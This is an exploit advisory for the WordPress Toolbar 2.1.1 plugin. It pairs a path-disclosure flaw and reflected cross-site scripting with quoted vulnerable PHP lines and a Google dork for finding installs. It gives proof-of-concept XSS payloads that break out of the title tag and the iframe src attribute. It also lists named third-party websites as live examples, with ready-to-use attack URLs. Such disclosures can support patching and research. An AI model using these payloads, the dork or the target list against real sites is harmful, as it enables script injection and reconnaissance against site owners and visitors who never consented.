WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/

Dork: "inurl:wp-toolbar.php"

## ## ## ##

eLwaux(c)2009 UASC.org.ua

## ## ## ##

Path Disclosure

/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1:  <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------

example:
 http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
 http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
 http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
 http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php


## ## ## ##

XSS

/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30:    $tourl = $_GET['wp-toolbar-tourl'];
42:    $blogtitle = $_GET['wp-toolbar-blogtitle'];
52:       <title><?php echo $blogtitle; ?> - Toolbar</title>
56:       <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------

PoC: 
 wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
 wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="

example:
 http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
 http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
 http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="